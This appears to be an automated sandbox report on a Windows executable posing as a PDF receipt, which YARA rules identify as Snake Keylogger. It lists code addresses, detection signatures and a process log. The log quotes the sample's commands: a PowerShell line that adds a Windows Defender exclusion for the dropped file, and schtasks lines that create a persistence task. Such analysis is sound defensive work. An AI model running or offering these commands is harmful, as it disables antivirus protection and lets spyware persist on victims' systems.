                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_055FD47011_2_055FD470
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_055FD46011_2_055FD460
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_055FF41011_2_055FF410
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_055FF40111_2_055FF401
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_055FDD1311_2_055FDD13
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_055F9D0011_2_055F9D00
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_055FDD2011_2_055FDD20
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_055FF85811_2_055FF858
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_055FF86711_2_055FF867
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_055FD8C811_2_055FD8C8
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_06787CA811_2_06787CA8
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678F36811_2_0678F368
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678798811_2_06787988
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678766811_2_06787668
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678BE4811_2_0678BE48
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_06783E2811_2_06783E28
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678860811_2_06788608
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_06781EE811_2_06781EE8
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678E6E811_2_0678E6E8
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678E6D811_2_0678E6D8
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_067866C811_2_067866C8
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678AEA811_2_0678AEA8
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_06782E8811_2_06782E88
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_06788F6811_2_06788F68
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_06788F5711_2_06788F57
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_06780F4811_2_06780F48
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678D74811_2_0678D748
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678572811_2_06785728
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_06789F0811_2_06789F08
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_067837E811_2_067837E8
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_06787FC811_2_06787FC8
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678C7A811_2_0678C7A8
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678478811_2_06784788
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678446811_2_06784468
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678445811_2_06784458
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_06788C4811_2_06788C48
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_06780C2811_2_06780C28
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678D42811_2_0678D428
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678540811_2_06785408
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678B4E811_2_0678B4E8
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_067834C811_2_067834C8
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678C48811_2_0678C488
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_06785D6811_2_06785D68
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678A54811_2_0678A548
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678A53811_2_0678A538
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678252811_2_06782528
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678ED2811_2_0678ED28
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_06786D0811_2_06786D08
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_067805E811_2_067805E8
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678CDE811_2_0678CDE8
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_06784DC811_2_06784DC8
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_067895A811_2_067895A8
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678158811_2_06781588
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678DD8811_2_0678DD88
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678927811_2_06789278
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678126811_2_06781268
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678DA6811_2_0678DA68
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_06785A4811_2_06785A48
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678A22811_2_0678A228
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678220811_2_06782208
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678EA0811_2_0678EA08
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_067882E811_2_067882E8
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_067802C811_2_067802C8
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678CAC811_2_0678CAC8
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_06784AA811_2_06784AA8
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678928811_2_06789288
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_06782B6811_2_06782B68
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678734811_2_06787348
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678BB2811_2_0678BB28
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678BB1811_2_0678BB18
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_06783B0811_2_06783B08
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_06789BE811_2_06789BE8
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_06781BC811_2_06781BC8
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678E3C811_2_0678E3C8
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_06781BB811_2_06781BB8
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_067863A811_2_067863A8
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678AB8811_2_0678AB88
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678A86811_2_0678A868
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678A86211_2_0678A862
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678284811_2_06782848
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678F04811_2_0678F048
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678702811_2_06787028
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678B80811_2_0678B808
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678000711_2_06780007
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_067850E811_2_067850E8
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_067898C811_2_067898C8
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_067818A811_2_067818A8
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678E0A811_2_0678E0A8
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678608811_2_06786088
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678C16811_2_0678C168
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678C15A11_2_0678C15A
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678414811_2_06784148
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678413711_2_06784137
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678892811_2_06788928
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678090811_2_06780908
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678D10811_2_0678D108
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_067869E811_2_067869E8
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678B1C811_2_0678B1C8
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_067831A811_2_067831A8
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1722656891.0000000001336000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameschtasks.exej% vs rDEKONT-1_16_2025__75kb__pdf.exe
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1728804720.00000000080A0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs rDEKONT-1_16_2025__75kb__pdf.exe
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1724559523.0000000003161000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs rDEKONT-1_16_2025__75kb__pdf.exe
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000000.1691739920.0000000000E14000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameIzLJ.exe" vs rDEKONT-1_16_2025__75kb__pdf.exe
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1731029741.000000000A050000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs rDEKONT-1_16_2025__75kb__pdf.exe
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1722563272.00000000012CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs rDEKONT-1_16_2025__75kb__pdf.exe
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1725618218.0000000004969000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs rDEKONT-1_16_2025__75kb__pdf.exe
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1725618218.0000000004969000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs rDEKONT-1_16_2025__75kb__pdf.exe
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1725618218.0000000004969000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs rDEKONT-1_16_2025__75kb__pdf.exe
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4148166401.0000000000444000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs rDEKONT-1_16_2025__75kb__pdf.exe
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4148609258.0000000000B37000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs rDEKONT-1_16_2025__75kb__pdf.exe
                  Source: rDEKONT-1_16_2025__75kb__pdf.exeBinary or memory string: OriginalFilenameIzLJ.exe" vs rDEKONT-1_16_2025__75kb__pdf.exe
                  Source: rDEKONT-1_16_2025__75kb__pdf.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 8.2.teXfNv.exe.4245570.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 8.2.teXfNv.exe.4245570.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 8.2.teXfNv.exe.4245570.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 8.2.teXfNv.exe.4288990.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 8.2.teXfNv.exe.4288990.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 8.2.teXfNv.exe.4288990.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.rDEKONT-1_16_2025__75kb__pdf.exe.4c070f8.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.rDEKONT-1_16_2025__75kb__pdf.exe.4c070f8.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.rDEKONT-1_16_2025__75kb__pdf.exe.4c070f8.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 8.2.teXfNv.exe.4245570.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 8.2.teXfNv.exe.4245570.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 8.2.teXfNv.exe.4288990.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 8.2.teXfNv.exe.4288990.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 8.2.teXfNv.exe.4288990.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.rDEKONT-1_16_2025__75kb__pdf.exe.4c070f8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.rDEKONT-1_16_2025__75kb__pdf.exe.4c070f8.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.rDEKONT-1_16_2025__75kb__pdf.exe.49b4148.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.rDEKONT-1_16_2025__75kb__pdf.exe.49b4148.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.rDEKONT-1_16_2025__75kb__pdf.exe.4994128.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.rDEKONT-1_16_2025__75kb__pdf.exe.4994128.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 00000008.00000002.1766895440.0000000004241000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000000.00000002.1725618218.0000000004969000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: rDEKONT-1_16_2025__75kb__pdf.exe PID: 7328, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: teXfNv.exe PID: 7888, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: rDEKONT-1_16_2025__75kb__pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: teXfNv.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@16/11@3/3
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeFile created: C:\Users\user\AppData\Roaming\teXfNv.exeJump to behavior
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7964:120:WilError_03
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7516:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7544:120:WilError_03
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeFile created: C:\Users\user\AppData\Local\Temp\tmpB0EF.tmpJump to behavior
                  Source: rDEKONT-1_16_2025__75kb__pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: rDEKONT-1_16_2025__75kb__pdf.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: rDEKONT-1_16_2025__75kb__pdf.exeVirustotal: Detection: 27%
                  Source: rDEKONT-1_16_2025__75kb__pdf.exeReversingLabs: Detection: 26%
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeFile read: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe "C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe"
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\teXfNv.exe"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\teXfNv" /XML "C:\Users\user\AppData\Local\Temp\tmpB0EF.tmp"
                  Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess created: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe "C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\teXfNv.exe C:\Users\user\AppData\Roaming\teXfNv.exe
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\teXfNv" /XML "C:\Users\user\AppData\Local\Temp\tmpC16A.tmp"
                  Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess created: C:\Users\user\AppData\Roaming\teXfNv.exe "C:\Users\user\AppData\Roaming\teXfNv.exe"
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\teXfNv.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\teXfNv" /XML "C:\Users\user\AppData\Local\Temp\tmpB0EF.tmp"Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess created: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe "C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\teXfNv" /XML "C:\Users\user\AppData\Local\Temp\tmpC16A.tmp"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess created: C:\Users\user\AppData\Roaming\teXfNv.exe "C:\Users\user\AppData\Roaming\teXfNv.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: uxtheme.dllJump to behavior
